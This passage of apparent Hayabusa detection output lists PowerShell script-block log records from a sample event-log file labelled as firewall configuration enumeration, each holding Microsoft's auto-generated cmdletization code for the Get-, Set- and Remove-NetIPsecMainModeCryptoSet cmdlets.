Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] 
[Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and 
(@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) 
$__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if 
($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetIPsecMainModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] 
[string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxMinutes}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters 
$__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 
'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = 
${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 
'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] 
